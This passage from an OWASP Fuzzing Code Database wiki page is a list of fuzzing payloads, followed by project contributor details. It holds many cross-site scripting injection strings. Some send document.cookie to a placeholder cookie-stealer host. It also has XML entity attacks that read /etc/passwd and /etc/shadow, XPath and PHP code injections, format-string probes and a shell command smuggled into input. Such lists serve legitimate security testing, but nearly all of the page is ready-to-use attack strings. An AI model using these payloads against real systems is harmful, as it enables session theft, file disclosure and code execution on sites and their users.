&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
